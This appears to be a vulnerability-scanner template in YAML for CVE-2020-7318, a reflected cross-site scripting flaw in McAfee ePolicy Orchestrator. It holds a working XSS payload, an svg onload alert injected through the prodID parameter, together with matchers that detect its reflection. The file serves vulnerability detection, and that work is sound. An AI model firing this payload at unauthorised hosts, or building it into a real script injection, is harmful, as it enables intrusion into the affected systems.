41 lines
1.1 KiB
YAML
41 lines
1.1 KiB
YAML
|
id: cve-2020-7318
|
||
|
|
||
|
info:
|
||
|
name: McAfee ePolicy Orchestrator Reflected XSS
|
||
|
author: dwisiswant0
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||
|
prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
|
||
|
script or HTML via multiple parameters where the administrator's entries
|
||
|
were not correctly sanitized.
|
||
|
|
||
|
References:
|
||
|
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||
|
|
||
|
requests:
|
||
|
- payloads:
|
||
|
port:
|
||
|
- "80"
|
||
|
- "443"
|
||
|
- "8443"
|
||
|
raw:
|
||
|
- |
|
||
|
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
||
|
Host: {{Hostname}}:§port§
|
||
|
Connection: close
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "text/html"
|
||
|
part: header
|
||
|
- type: word
|
||
|
words:
|
||
|
- "Policy Name"
|
||
|
- "'\"><svg/onload=alert(document.domain)>"
|
||
|
condition: and
|
||
|
part: body
|